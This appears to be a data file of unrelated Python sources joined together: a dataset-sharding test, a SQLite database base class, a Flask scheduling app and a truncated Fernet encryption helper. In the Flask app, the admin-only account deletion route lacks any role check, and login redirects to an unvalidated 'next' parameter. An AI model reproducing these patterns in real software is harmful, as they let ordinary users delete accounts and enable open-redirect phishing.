            # Since our random iterable dataset will be... random... we need to use a seed to get reproducible results.
            random.seed(seed)
            iterable_dataset_lists.append(list(iterable_dataset_shard))
        shard_batch_size = batch_size // num_processes if split_batches else batch_size
        # All iterable dataset shard should have the same length, a round multiple of shard_batch_size
        first_list = iterable_dataset_lists[0]
        for l in iterable_dataset_lists[1:]:
            self.assertEqual(len(l), len(first_list))
            self.assertTrue(len(l) % shard_batch_size == 0)
        observed = []
        for idx in range(0, len(first_list), shard_batch_size):
            for l in iterable_dataset_lists:
                observed += l[idx : idx + shard_batch_size]
        if not drop_last:
            # Without drop_last the shards wrap around, so extend the reference
            # cyclically before comparing.
            while len(reference) < len(observed):
                reference += reference
        self.assertListEqual(observed, reference[: len(observed)])
    def test_iterable_dataset_shard(self):
        seed = 42
        dataset = RandomIterableDataset()
        self.check_iterable_dataset_shards(dataset, seed, batch_size=4, drop_last=False, split_batches=False)
        self.check_iterable_dataset_shards(dataset, seed, batch_size=4, drop_last=True, split_batches=False)
        self.check_iterable_dataset_shards(dataset, seed, batch_size=4, drop_last=False, split_batches=True)
        self.check_iterable_dataset_shards(dataset, seed, batch_size=4, drop_last=True, split_batches=True)
        # Edge case with a very small dataset
        dataset = RandomIterableDataset(max_length=2)
        self.check_iterable_dataset_shards(dataset, seed, batch_size=4, drop_last=False, split_batches=False)
        self.check_iterable_dataset_shards(dataset, seed, batch_size=4, drop_last=True, split_batches=False)
        self.check_iterable_dataset_shards(dataset, seed, batch_size=4, drop_last=False, split_batches=True)
        self.check_iterable_dataset_shards(dataset, seed, batch_size=4, drop_last=True, split_batches=True)
| 10,249 | 3,712 |
from .product import ProductForm
from .receipt import ReceiptForm
from .user import LoginForm, RegisterForm, EditUserForm | 121 | 30 |
# -*- coding: utf-8 -*-
"""
/***************************************************************************
MOPA
An independet project
Método de Obtenção da Posição de Atirador
-------------------
begin : 2019-01-15
git sha : $Format:%H$
copyright : (C) 2018 by João P. Esperidião
email : joao.p2709@gmail.com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
import sqlite3, os
from PyQt5.QtCore import QObject
from Core.enums import Enums
from Core.DatabaseTools.SqlGenerator.sqlGeneratorFactory import SqlGeneratorFactory
class AbstractDatabase(QObject):
    """Base class for database access objects.

    Connection, querying and driver identification are stubs to be
    reimplemented by concrete drivers; the convenience methods below assume
    the subclass's `query` returns an iterable of result rows.
    """
    def __init__(self, parameters=None):
        """
        Connects to a database and manages its contents.
        :parameters: (dict) connection parameters.
        """
        super(AbstractDatabase, self).__init__()
        self.connect(parameters)
        self.gen = self.sqlGenerator()
    def driver(self):
        """
        Gets current connection's driver.
        :return: (int) driver code/enum.
        """
        return Enums.NoDatabase
    def driverName(self):
        """
        Gets current connection's driver name.
        """
        return "NoDriver"
    def name(self):
        """
        Gets current database's connection name.
        :return: (str) database name.
        """
        return ''
    def query(self, sql, commit=False):
        """
        Executes a query on loaded database.
        :param sql: (str) SQL statement to be executed on the database.
        :param commit: (bool) if any changes should be commited to database.
        :return: (cursor?) cursor to query results.
        """
        # to be reimplemented
        pass
    def validateConnectionParameters(self, parameters):
        """
        Validates connection parameters before trying to connect it.
        :parameters: (dict) connection parameters.
        :return: (bool) parameters' validity status.
        """
        # to be reimplemented
        return False
    def connect(self, parameters):
        """
        Connects to a database and sets it to db attribute.
        :parameters: (dict) connection parameters.
        :return: () database object.
        """
        # to be reimplemented
        self.db = None
    def isConnected(self):
        """
        Checks if current database is connected to a valid source.
        :return: (bool) validity status.
        """
        # to be reimplemented
        return self.db is not None
    def createDatabase(self, parameters):
        """
        Creates a database.
        :return: (bool) creation status.
        """
        # to be reimplemented
        return False
    def disconnect(self):
        """
        Disconnects from a database, if connected to any.
        """
        if self.db is not None:
            self.db.close()
            # drop the reference before resetting the attribute
            del self.db
            self.db = None
    def sqlGenerator(self):
        """
        Gets a SQL generator object.
        :return: (AbstractSqlGenerator) SQL generator.
        """
        return SqlGeneratorFactory.getGenerator(self.driver())
    def createObservations(self):
        """
        Creates observations table.
        :return: (bool) execution status.
        """
        # NOTE(review): checks for table 'observation' (singular) while
        # createSensors checks 'sensors' (plural) — confirm both match the
        # generator's DDL.
        self.query(self.gen.createObservations(), commit=True)
        return 'observation' in self.allTables()
    def createSensors(self):
        """
        Creates observations table.
        :return: (bool) execution status.
        """
        self.query(self.gen.createSensors(), commit=True)
        return 'sensors' in self.allTables()
    def allTables(self):
        """
        Gets a list of all available tables.
        :return: (list-of-str) list of names from available tables.
        """
        if self.isConnected():
            return [t[0] for t in self.query(self.gen.allTables())]
        return []
    def allObservations(self):
        """
        A list of all observation's information present at the database.
        :return: (list-of-tuple) observations' informations.
        """
        if self.isConnected():
            return self.query(self.gen.allObservations())
        return []
    def allSensors(self):
        """
        A list of all sensor's information present at the database.
        :return: (list-of-tuple) sensors' informations.
        """
        if self.isConnected():
            return self.query(self.gen.allSensors())
        return []
    def getSensor(self, sensorId):
        """
        Gets a sensor using its ID.
        :param sensorId: (int) sensor's ID.
        :return: (tuple) sensor's informations, if it exists.
        """
        if self.isConnected():
            sensorL = self.query(self.gen.getSensor(sensorId))
            return sensorL[0] if len(sensorL) > 0 else tuple()
        return tuple()
    def addObservation(self, azimuth, zenith, sensorId, commit=True):
        """
        Adds a sensor to the database.
        :param azimuth: observation's azimuth angle.
        :param zenith: observation's zenith angle.
        :param sensorId: (str) station's ID.
        :param commit: (bool) commit addition to database.
        """
        # NOTE(review): returns the query result here, while addSensor below
        # discards it — confirm whether callers rely on the cursor.
        if self.isConnected():
            return self.query(
                self.gen.addObservation(azimuth, zenith, sensorId), commit
            )
        return
    def addSensor(self, coordinates, epsg, name=None, status=True, commit=True):
        """
        Gets a sensor using its ID.
        :param coordinates: (tuple-of-float) sensor's coordinates.
        :param epsg: (int) sensor's CRS auth id.
        :param name: (str) station's friendly name.
        :param status: (bool) working status.
        :param commit: (bool) commit addition to database.
        """
        if self.isConnected():
            self.query(
                self.gen.addSensor(coordinates, epsg, name, status), commit
            )
        return
    def updateObservation(self, table, obs, commit=True):
        """
        Updates observation's information. Observation information should already
        exist into the database.
        :param table: (str) observations' table name.
        :param sensor: (Observation) observation object.
        :param commit: (bool) commit addition to database.
        """
        if self.isConnected():
            self.query(
                self.gen.updateObservation(
                    table=table, obsId=obs['id'], azimuth=obs['azimuth'],
                    zenith=obs['zenith'], sensorId=obs['sensorId'],
                    date=obs['date']
                ), commit
            )
    def updateSensor(self, table, sensor, commit=True):
        """
        Updates sensors information. Sensor information should already exist into
        the database.
        :param table: (str) sensors' table name.
        :param sensor: (Sensor) sensor object.
        :param commit: (bool) commit addition to database.
        """
        if self.isConnected():
            # coordinates are stored serialized as a comma-separated string
            coord = ",".join(map(str, sensor['coordinates']))
            self.query(
                self.gen.updateSensor(
                    table=table, epsg=sensor['epsg'], sensorId=sensor['id'],
                    coord=coord, onDate=sensor['activation_date'],
                    status=sensor['status'], name=sensor['name'],
                    offDate=sensor['deactivation_date']
                ), commit
            )
    def createShootersTable(self, tablename, commit=True):
        """
        Creates the shooters' table. Method should be invoked from settings module.
        :para tablename: (str) shooters' table name (default from settings).
        :param commit: (bool) commit table creation to the database.
        """
        if self.isConnected() and not self.tableExists(tablename):
            self.query(self.gen.createShootersTable(tablename), commit)
            return self.tableExists(tablename)
        return False
    def dropShootersTable(self, tablename, commit=True):
        """
        Drops shooters' table. Method should be invoked from settings module.
        :para tablename: (str) shooters' table name (default from settings).
        :param commit: (bool) commit table creation to the database.
        """
        if self.isConnected() and self.tableExists(tablename):
            self.query(self.gen.dropTable(tablename), commit)
            return not self.tableExists(tablename)
        return False
    def tableExists(self, tablename):
        """
        Verifies if table exists into database.
        :param tablename: (str) table's name.
        :return: (bool) whether table exists.
        """
        return tablename in self.allTables()
| 9,435 | 2,474 |
import calendar
import os
from datetime import datetime
from dateutil.parser import parse
# server side rendering related imports
from flask import render_template, url_for, flash, redirect, request, jsonify, send_from_directory
# login related imports
from flask_login import login_user, logout_user, login_required, current_user
# SQLAlchemy related imports
from sqlalchemy import extract, and_, func
# __init__.py imports
from scheduler import app, db, bcrypt
# Forms
from scheduler.forms import RegistrationForm, LoginForm, EmployeeForm, DepartmentForm, ForecastItemsForm, ProjectForm, \
AssignmentForm, FilterForm, AccountForm, SearchEmployeeForm, SearchAssignmentForm, \
SearchProjectsForm
from scheduler.models import ForecastItemSchema, ProjectSchema, EmployeesSchema
# DB Models
from scheduler.models import User, Department, Employee, Project, ForecastItem, AssignmentTypes
@app.route('/favicon.ico')
def favicon():
    """Serve the site favicon from the application's static directory."""
    static_dir = os.path.join(app.root_path, 'static')
    return send_from_directory(static_dir, 'favicon.ico',
                               mimetype='image/vnd.microsoft.icon')
@app.route("/", methods=['GET', 'POST'])
@app.route("/home", methods=['GET', 'POST'])
@login_required
def home():
    """Render the monthly schedule view.

    GET shows the current month; POST re-filters by the year/month submitted
    through the FilterForm. Visibility is role-based: Admins see every item,
    Editors see items they created, everyone else sees items assigned to
    their own employee record.

    Bug fix: the original tested ``form.validate_on_submit`` without calling
    it — a bound method is always truthy, so every POST "validated". It is
    now invoked.
    """
    curr_user = current_user.id
    form = FilterForm()
    newTask = ForecastItemsForm()
    cal = calendar.TextCalendar(calendar.SUNDAY)

    def _month_days(year, month):
        # All dates of `month` formatted mm/dd/yyyy; calendar weeks can spill
        # into adjacent months, so those days are skipped.
        return [d.strftime('%m/%d/%Y')
                for week in cal.monthdatescalendar(year, month)
                for d in week if d.month == month]

    selected_year = datetime.today().year
    selected_month = datetime.today().month
    days = _month_days(selected_year, selected_month)

    if current_user.role == 'Admin':
        data = db.session.query(ForecastItem) \
            .filter(extract('month', ForecastItem.start_date) == selected_month).all()
    elif current_user.role == 'Editor':
        data = db.session.query(ForecastItem) \
            .filter(and_(extract('month', ForecastItem.start_date) == selected_month),
                    ForecastItem.user_id == curr_user).all()
    else:
        data = db.session.query(ForecastItem) \
            .filter(and_(extract('month', ForecastItem.start_date) == selected_month),
                    ForecastItem.employee_id == current_user.employee_id).all()

    if request.method == "POST" and form.validate_on_submit():
        new_year = request.form["filter_by_year"]
        new_month = request.form["filter_by_month"]
        selected_year = int(new_year)
        selected_month = datetime.strptime(new_month, '%B').month
        days = _month_days(selected_year, selected_month)
        form.filter_by_year.data = new_year
        # Restrict the month choices to months that actually have items in
        # the selected year.
        form.filter_by_month.choices = [
            item.start_date.strftime('%B') for item in
            db.session.query(ForecastItem)
            .distinct(func.to_char(ForecastItem.start_date, "FMMonth"))
            .filter(extract('year', ForecastItem.start_date) == f'{new_year}')
        ]
        # NOTE(review): this branch filters by user_id for every role, unlike
        # the role-based logic above — confirm Admin/viewer filtering is
        # intended here.
        data = db.session.query(ForecastItem).filter(
            and_(extract('year', ForecastItem.start_date) == new_year,
                 extract('month', ForecastItem.start_date) == selected_month,
                 ForecastItem.user_id == curr_user)).all()
    return render_template('home.html',
                           days=days,
                           data=data,
                           form=form,
                           newTask=newTask)
@app.route("/assignments", methods=['GET', 'POST'])
@login_required
def assignments():
    """List, search and create forecast assignments.

    Default listing is role-based (Admin: all; Editor: own items; others:
    items assigned to their employee record). A submitted search form narrows
    the Editor's own items by employee name, project name or project number.
    A submitted ForecastItemsForm creates a new item and redirects home.
    """
    form = ForecastItemsForm()
    search_form = SearchAssignmentForm()
    res = search_form.searchField.data
    choice = search_form.searchBy.data
    curr_user = current_user.id
    if current_user.role == 'Admin':
        data = ForecastItem.query.all()
    elif current_user.role == 'Editor':
        data = ForecastItem.query.filter(ForecastItem.user_id == curr_user)
    else:
        data = ForecastItem.query.filter(ForecastItem.employee_id == current_user.employee_id)
    # Search branch: only runs when a non-empty search field was submitted.
    # NOTE(review): all search queries filter by the current user's items
    # regardless of role — confirm Admin search is intended to be restricted.
    if res and search_form.validate_on_submit():
        if choice == 'First Name':
            data = ForecastItem.query.join(Employee) \
                .filter(and_(ForecastItem.user_id == curr_user, Employee.first_name.like(f'%{res.capitalize()}%'))
                        ).all()
        elif choice == 'Last Name':
            data = ForecastItem.query.join(Employee) \
                .filter(and_(ForecastItem.user_id == curr_user, Employee.last_name.like(f'%{res.capitalize()}%'))
                        ).all()
        elif choice == 'Project Name':
            data = ForecastItem.query.join(Project) \
                .filter(and_(ForecastItem.user_id == curr_user, Project.project_name.like(f'%{res.capitalize()}%'))
                        ).all()
        elif choice == 'Project Number':
            data = ForecastItem.query.join(Project) \
                .filter(and_(ForecastItem.user_id == curr_user, Project.project_number == res)
                        ).all()
        else:
            data = ForecastItem.query.filter(ForecastItem.user_id == curr_user).all()
        return render_template('assignments.html',
                               title='Assignments',
                               form=form,
                               search_form=search_form,
                               data=data)
    # Creation branch: a valid ForecastItemsForm submission adds a new item.
    if form.validate_on_submit():
        forecast_item = ForecastItem(
            employee_id=form.employee.data,
            user_id=current_user.id,
            project_id=form.project.data,
            assignment_id=form.assignment.data,
            status=form.status.data,
            description=form.description.data,
            start_date=form.start_date.data,
            end_date=form.end_date.data
        )
        db.session.add(forecast_item)
        db.session.commit()
        flash('Task has been added.', 'success')
        return redirect(url_for('home'))
    return render_template('assignments.html',
                           title='Assignments',
                           form=form,
                           search_form=search_form,
                           data=data)
@app.route("/assignments/<int:assignment_id>", methods=['GET', 'POST'])
@login_required
def assignment(assignment_id):
if current_user.role == 'Admin' or current_user.role == 'Editor':
data = ForecastItem.query.get_or_404(assignment_id)
form = ForecastItemsForm()
if form.validate_on_submit():
data.employee_id = form.employee.data
data.project_id = form.project.data
data.assignment_id = form.assignment.data
data.status = form.status.data
data.description = form.description.data
data.start_date = form.start_date.data
data.end_date = form.end_date.data
db.session.commit()
flash('Task has been updated!', 'success')
return redirect(url_for('assignments',
assignment_id=assignment_id))
elif request.method == 'GET':
form.employee.data = data.employee_id
form.project.data = data.project_id
form.assignment.data = data.assignment_id
form.status.data = data.status
form.description.data = data.description
form.start_date.data = data.start_date
form.end_date.data = data.end_date
return render_template('assignment.html',
title='Update Assignment',
data=data,
form=form)
else:
return redirect(url_for('home'))
@app.route("/assignments/<int:assignment_id>/delete", methods=['POST'])
@login_required
def delete_assignment(assignment_id):
if current_user.role == 'Admin' or current_user.role == 'Editor':
data = ForecastItem.query.get_or_404(assignment_id)
db.session.delete(data)
db.session.commit()
flash('Task has been deleted!.', 'success')
return redirect(url_for('assignments'))
else:
return redirect(url_for('home'))
@app.route("/assignments_report", methods=['GET', 'POST'])
@login_required
def assignments_report():
form = FilterForm()
if current_user.role == 'Admin':
data = ForecastItem.query.join(Employee).all()
elif current_user.role == 'Editor':
data = ForecastItem.query.filter(ForecastItem.user_id == current_user.id)
else:
data = ForecastItem.query.filter(ForecastItem.employee_id == current_user.employee_id)
return render_template('assignments_report.html', title='Assignments Report', data=data, form=form)
@app.route("/assignments_report_csv", methods=['GET'])
@login_required
def assignments_report_csv():
if request.method == 'GET':
if current_user.role == 'Admin':
data = ForecastItem.query.join(Employee).all()
serialized = ForecastItemSchema(many=True)
result = serialized.dump(data)
return jsonify({'data': result})
elif current_user.role == 'Editor':
data = ForecastItem.query \
.join(Employee) \
.filter(ForecastItem.user_id == current_user.id)
serialized = ForecastItemSchema(many=True)
result = serialized.dump(data)
return jsonify({'data': result})
else:
data = ForecastItem.query \
.join(Employee) \
.filter(ForecastItem.employee_id == current_user.employee_id)
serialized = ForecastItemSchema(many=True)
result = serialized.dump(data)
return jsonify({'data': result})
else:
return redirect(url_for(assignments_report))
@app.route("/employees", methods=['GET', 'POST'])
@login_required
def employees():
if current_user.role == 'Admin' or current_user.role == 'Editor':
form = EmployeeForm()
search_form = SearchEmployeeForm()
res = search_form.searchField.data
choice = search_form.searchBy.data
data = Employee.query.join(Department) \
.filter(Employee.department_id == Department.id) \
.order_by(Employee.first_name.asc())
if res and search_form.validate_on_submit():
if choice == 'First Name':
data = Employee.query.join(Department) \
.filter(Employee.first_name.like(f'%{res.capitalize()}%'))
elif choice == 'Last Name':
data = Employee.query.join(Department) \
.filter(Employee.last_name.like(f'%{res.capitalize()}%'))
elif choice == 'Department':
data = Employee.query.join(Department) \
.filter(Department.name.like(f'%{res.capitalize()}%'))
else:
data = Employee.query.join(Department) \
.filter(Employee.department_id == Department.id) \
.order_by(Employee.first_name.asc())
return render_template('employees.html',
title='Employees',
form=form,
search_form=search_form,
data=data)
if form.validate_on_submit():
new_employee = Employee(first_name=form.first_name.data,
last_name=form.last_name.data,
department_id=form.department.data
)
db.session.add(new_employee)
db.session.commit()
flash(f'{form.first_name.data} {form.first_name.data} has been added.', 'success')
return redirect(url_for('home'))
return render_template('employees.html',
title='Employees',
form=form,
search_form=search_form,
data=data)
else:
return redirect(url_for('home'))
@app.route("/employees/<int:employee_id>", methods=['GET', 'POST'])
@login_required
def employee(employee_id):
data = Employee.query.get_or_404(employee_id)
form = EmployeeForm()
related = ForecastItem.query.join(Employee).filter(
and_(Employee.id == employee_id, ForecastItem.employee_id == employee_id))
if form.validate_on_submit():
data.first_name = form.first_name.data
data.last_name = form.last_name.data
data.department_id = form.department.data
db.session.commit()
flash(f'{data.first_name} {data.last_name}\'s information has been updated.', 'success')
return redirect(url_for('employees',
employee_id=employee_id))
elif request.method == 'GET':
form.first_name.data = data.first_name
form.last_name.data = data.last_name
form.department.data = data.department_id
return render_template('employee.html',
title='Employee Information',
data=data,
form=form,
related=related)
@app.route("/employees/<int:employee_id>/delete", methods=['POST'])
@login_required
def delete_employee(employee_id):
if current_user.role == 'Admin' or current_user.role == 'Editor':
data = Employee.query.get_or_404(employee_id)
db.session.delete(data)
db.session.commit()
flash('Employee has been deleted.', 'success')
return redirect(url_for('employees'))
else:
return redirect(url_for('home'))
@app.route("/employees_report", methods=['GET', 'POST'])
@login_required
def employees_report():
if current_user.role == 'Admin' or current_user.role == 'Editor':
data = Employee.query.join(Department) \
.filter(Employee.department_id == Department.id) \
.order_by(Employee.first_name.asc())
form = FilterForm()
return render_template('employees_report.html',
title='Projects Report',
data=data,
form=form)
else:
return redirect(url_for('home'))
@app.route("/employees_report_csv", methods=['GET'])
@login_required
def employees_report_csv():
if current_user.role == 'Admin' or current_user.role == 'Editor':
if request.method == 'GET':
data = Employee.query.join(Department) \
.filter(Employee.department_id == Department.id) \
.order_by(Employee.first_name.asc())
serialized = EmployeesSchema(many=True)
result = serialized.dump(data)
return jsonify({'data': result})
else:
return redirect(url_for('home'))
@app.route("/departments", methods=['GET', 'POST'])
@login_required
def departments():
if current_user.role == 'Admin':
data = Department.query.order_by(Department.name.asc()).all()
form = DepartmentForm()
if form.validate_on_submit():
new_department = Department(name=form.name.data)
db.session.add(new_department)
db.session.commit()
flash(f'{form.name.data} department has been added.', 'success')
return redirect(url_for('home'))
return render_template('departments.html',
title='Departments',
form=form,
data=data)
else:
return redirect(url_for('home'))
@app.route("/departments/<int:department_id>", methods=['GET', 'POST'])
@login_required
def department(department_id):
if current_user.role == 'Admin':
data = Department.query.get_or_404(department_id)
assigned_employees = Employee.query.filter_by(department_id=department_id).order_by(
Employee.first_name.asc()).all()
form = DepartmentForm()
if form.validate_on_submit():
data.name = form.name.data
db.session.commit()
flash('Department name has been updated.', 'success')
return redirect(url_for('departments',
department_id=department_id))
elif request.method == 'GET':
form.name.data = data.name
return render_template('department.html',
title='Edit Department',
data=data,
form=form,
assigned_employees=assigned_employees)
else:
return redirect(url_for('home'))
@app.route("/departments/<int:department_id>/delete", methods=['POST'])
@login_required
def delete_department(department_id):
if current_user.role == 'Admin':
data = Department.query.get_or_404(department_id)
db.session.delete(data)
db.session.commit()
flash('Department has been deleted.', 'success')
return redirect(url_for('departments'))
else:
return redirect(url_for('home'))
@app.route("/projects", methods=['GET', 'POST'])
@login_required
def projects():
if current_user.role == 'Admin' or current_user.role == 'Editor':
form = ProjectForm()
search_form = SearchProjectsForm()
res = search_form.searchField.data
choice = search_form.searchBy.data
data = Project.query.join(Employee).order_by(Project.project_number.asc()).all()
if res and search_form.validate_on_submit():
if choice == 'Project Number':
data = Project.query.join(Employee) \
.filter(Project.project_number == res) \
.order_by(Project.project_number.asc()).all()
elif choice == 'Project Name':
data = Project.query.join(Employee).filter(Project.project_name.like(f'%{res.capitalize()}%')).all()
elif choice == 'Manager\'s First Name':
data = Project.query.join(Employee).filter(Employee.first_name.like(f'%{res.capitalize()}%')).all()
elif choice == 'Manager\'s Last Name':
data = Project.query.join(Employee).filter(Employee.last_name.like(f'%{res.capitalize()}%')).all()
else:
data = Project.query.join(Employee).order_by(Project.project_number.asc()).all()
return render_template('projects.html',
title='Projects',
form=form,
search_form=search_form,
data=data)
if form.validate_on_submit():
new_project = Project(
user_id=current_user.id,
project_number=form.project_number.data,
project_name=form.project_name.data,
manager_id=form.project_manager.data,
project_status=form.project_status.data,
project_description=form.project_description.data
)
db.session.add(new_project)
db.session.commit()
flash(f'{form.project_number.data} has been added.', 'success')
return redirect(url_for('home'))
else:
return redirect(url_for('home'))
return render_template('projects.html',
title='Projects',
form=form,
search_form=search_form,
data=data)
@app.route("/projects/<int:project_id>", methods=['GET', 'POST'])
@login_required
def project(project_id):
if current_user.role == 'Admin' or current_user.role == 'Editor':
data = Project.query.get_or_404(project_id)
form = ProjectForm()
related = ForecastItem.query.join(Employee).filter(
and_(Project.id == project_id, ForecastItem.project_id == project_id))
if form.validate_on_submit():
data.user_id = current_user.id
data.project_number = form.project_number.data
data.project_name = form.project_name.data
data.manager_id = form.project_manager.data
data.project_status = form.project_status.data
data.project_description = form.project_description.data
db.session.commit()
flash('Project information has been updated.', 'success')
return redirect(url_for('projects',
project_id=project_id))
elif request.method == 'GET':
form.project_number.data = data.project_number
form.project_name.data = data.project_name
form.project_manager.data = data.manager_id
form.project_status.data = data.project_status
form.project_description.data = data.project_description
return render_template('project.html',
title='Edit Project Information',
data=data,
form=form,
related=related)
else:
return redirect(url_for('home'))
@app.route("/projects/<int:project_id>/delete", methods=['POST'])
@login_required
def delete_project(project_id):
if current_user.role == 'Admin' or current_user.role == 'Editor':
data = Project.query.get_or_404(project_id)
db.session.delete(data)
db.session.commit()
flash('Project has been deleted.', 'success')
return redirect(url_for('projects'))
else:
return redirect(url_for('home'))
@app.route("/projects_report", methods=['GET', 'POST'])
@login_required
def projects_report():
if current_user.role == 'Admin' or current_user.role == 'Editor':
data = Project.query.join(Employee)
form = FilterForm()
return render_template('project_reports.html',
title='Projects Report',
data=data,
form=form)
else:
return redirect(url_for('home'))
@app.route("/projects_report_csv", methods=['GET'])
@login_required
def projects_report_csv():
if current_user.role == 'Admin' or current_user.role == 'Editor':
if request.method == 'GET':
data = Project.query.join(Employee)
serialized = ProjectSchema(many=True)
result = serialized.dump(data)
return jsonify({'data': result})
else:
return redirect(url_for('home'))
@app.route("/assignment_types", methods=['GET', 'POST'])
@login_required
def assignment_types():
if current_user.role == 'Admin':
data = AssignmentTypes.query.order_by(AssignmentTypes.assignment_type.asc()).all()
form = AssignmentForm()
if form.validate_on_submit():
assignment = AssignmentTypes(assignment_type=form.assignment_name.data)
db.session.add(assignment)
db.session.commit()
flash('New assignment type has been added.', 'success')
return redirect(url_for('home'))
return render_template('assignment_types.html',
title='Assignment Types',
form=form,
data=data)
else:
return redirect(url_for('home'))
@app.route("/assignment_types/<int:assignment_type_id>", methods=['GET', 'POST'])
@login_required
def assignment_type(assignment_type_id):
if current_user.role == 'Admin':
data = AssignmentTypes.query.get_or_404(assignment_type_id)
form = AssignmentForm()
if form.validate_on_submit():
data.assignment_type = form.assignment_name.data
db.session.commit()
flash('Assignment type has been updated.', 'success')
return redirect(url_for('assignment_types',
assignment_type_id=assignment_type_id))
elif request.method == 'GET':
form.assignment_name.data = data.assignment_type
return render_template('assignment_type.html',
title='Assignment Type Information',
data=data,
form=form)
else:
return redirect(url_for('home'))
@app.route("/assignment_types/<int:assignment_type_id>/delete", methods=['POST'])
@login_required
def delete_assignment_type(assignment_type_id):
if current_user.role == 'Admin':
data = AssignmentTypes.query.get_or_404(assignment_type_id)
db.session.delete(data)
db.session.commit()
flash('assignment type has been deleted.', 'success')
return redirect(url_for('assignment_types'))
else:
return redirect(url_for('home'))
# enable this route for manual registration when needed. remember to enable the appropriate links and templates
# @app.route("/register", methods=['GET', 'POST'])
# def register():
# if current_user.is_authenticated:
# return redirect(url_for('home'))
#
# form = RegistrationForm()
# if form.validate_on_submit():
# hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')
# user = User(
# username=form.username.data,
# email=form.email.data,
# password=hashed_password
# )
# db.session.add(user)
# db.session.commit()
# flash(f'Account created for {form.email.data}.', 'success')
# return redirect(url_for('login'))
# return render_template('register.html',
# title='Register',
# form=form)
@app.route("/login", methods=['GET', 'POST'])
def login():
if current_user.is_authenticated and current_user.is_active:
return redirect(url_for('home'))
form = LoginForm()
if form.validate_on_submit():
user_name = User.query.filter_by(username=form.username.data).first()
if user_name and bcrypt.check_password_hash(user_name.password, form.password.data):
login_user(user_name, remember=form.remember.data)
next_page = request.args.get('next')
return redirect(next_page) if next_page else redirect(url_for('home'))
else:
flash('Login Unsuccessful. Please contact your IT Administrator.', 'danger')
return render_template('login.html',
title='Login',
form=form)
@app.route("/logout")
def logout():
logout_user()
return redirect(url_for('home'))
@app.route("/account", methods=['GET', 'POST'])
@login_required
def account():
users_data = User.query.all()
projects_data = Project.query \
.join(Employee) \
.order_by(Project.project_number.asc()) \
.all()
if current_user.role == 'Admin':
assignments_data = ForecastItem.query \
.join(Project) \
.join(Employee) \
.join(AssignmentTypes) \
.all()
elif current_user.role == 'Editor':
projects_data = Project.query \
.join(Employee) \
.join(User) \
.filter(Project.user_id == current_user.id) \
.order_by(Project.project_number.asc())
assignments_data = ForecastItem.query \
.join(Project, ForecastItem.project_id == Project.id) \
.join(Employee, Employee.id == ForecastItem.employee_id) \
.join(User, ForecastItem.user_id == User.id) \
.join(AssignmentTypes) \
.filter(ForecastItem.user_id == current_user.id) \
.limit(10)
else:
assignments_data = ForecastItem.query \
.filter(ForecastItem.employee_id == current_user.employee_id)
return render_template('account.html',
title='Account',
users_data=users_data,
current_user=current_user,
projects_data=projects_data,
assignments_data=assignments_data
)
# connects to fetch_months.js script to get the distinct dates from the database without refresh the form
@app.route("/fetch_months", methods=['POST'])
@login_required
def fetch_months():
req = request.json['year_num']
def isDate(string, fuzzy=False):
try:
parse(string, fuzzy=fuzzy)
choices = [
item.start_date.strftime('%B') for item in
db.session.query(ForecastItem)
.distinct(func.to_char(ForecastItem.start_date, "FMMonth"))
.filter(extract('year', ForecastItem.start_date) == string)
]
return choices
except Exception as err:
print(err)
return False
return jsonify({'month_choices': isDate(req)})
# For admin use only
@app.route("/account/<int:user_id>", methods=['GET', 'POST'])
@login_required
def edit_account(user_id):
curr_user = current_user
if curr_user.role == 'Admin':
data = User.query.get_or_404(user_id)
form = AccountForm()
if form.validate_on_submit():
hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')
data.username = form.username.data
data.email = form.email.data
data.password = hashed_password
data.role = form.role.data
data.is_active = form.is_active.data
data.employee_id = form.employee.data
db.session.commit()
flash('User information has been updated.', 'success')
return redirect(url_for('account', id=user_id))
elif request.method == 'GET':
form.username.data = data.username
form.email.data = data.email
form.role.data = data.role
form.is_active.data = data.is_active
form.employee.data = data.employee_id
return render_template('edit_account.html',
title='Edit Account',
form=form,
data=data)
else:
return redirect(url_for('home'))
# For admin use only
@app.route("/account/<int:user_id>/delete", methods=['POST'])
@login_required
def delete_account(user_id):
data = User.query.get_or_404(user_id)
db.session.delete(data)
db.session.commit()
flash(f'{data.username} has been deleted.', 'success')
return redirect(url_for('account'))
# For admin use only
@app.route("/register_as_admin", methods=['GET', 'POST'])
@login_required
def register_as_admin():
curr_user = current_user
if curr_user.role == 'Admin':
form = RegistrationForm()
if form.validate_on_submit():
hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')
user = User(
username=form.username.data,
email=form.email.data,
role=form.role.data,
employee_id=form.employee.data,
password=hashed_password
)
db.session.add(user)
db.session.commit()
flash(f'Account created for {form.email.data}.', 'success')
return redirect(url_for('account'))
return render_template('register_as_admin.html',
title='Register New',
form=form)
else:
return redirect(url_for('home'))
# error pages
@app.errorhandler(403)
def forbidden_error(e):
    """Render the 403 page with the correct HTTP status.

    FIXES: all three error handlers shared the name ``page_not_found``
    (later defs shadowed earlier ones at module level), and the handler
    returned the template body with an implicit 200 status.
    """
    return render_template('errors/403.html'), 403
# error pages
@app.errorhandler(404)
def page_not_found(e):
    """Render the 404 page with the correct HTTP status (was implicit 200)."""
    return render_template('errors/404.html'), 404
# error pages
@app.errorhandler(500)
def internal_server_error(e):
    """Render the 500 page with the correct HTTP status.

    Renamed from ``page_not_found`` (shared with the 403/404 handlers) and
    given an explicit 500 status instead of the implicit 200.
    """
    return render_template('errors/500.html'), 500
| 32,094 | 8,901 |
import base64
import os
from cryptography.fernet import Fernet
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
def getKey(salt, password):
    """Derive a Fernet instance from *salt* and *password*.

    Uses PBKDF2-HMAC-SHA256 (100000 iterations) to derive a 32-byte key,
    urlsafe-base64 encoded as Fernet requires.  Both arguments are str.
    """
    # SECURITY FIX: the password and salt were printed to stdout, leaking
    # secrets into console output/logs; the debug prints are removed.
    kdf = PBKDF2HMAC(
        algorithm=hashes.SHA256(),
        length=32,
        salt=salt.encode(),
        iterations=100000
    )
    key = base64.urlsafe_b64encode(kdf.derive(password.encode()))
    return Fernet(key)
def encryptMessage(key, message):
    """Encrypt *message* (str) with Fernet instance *key*; return the token bytes."""
    return key.encrypt(message.encode())
def decrypt(key, token):
    """Decrypt *token* with Fernet instance *key*.

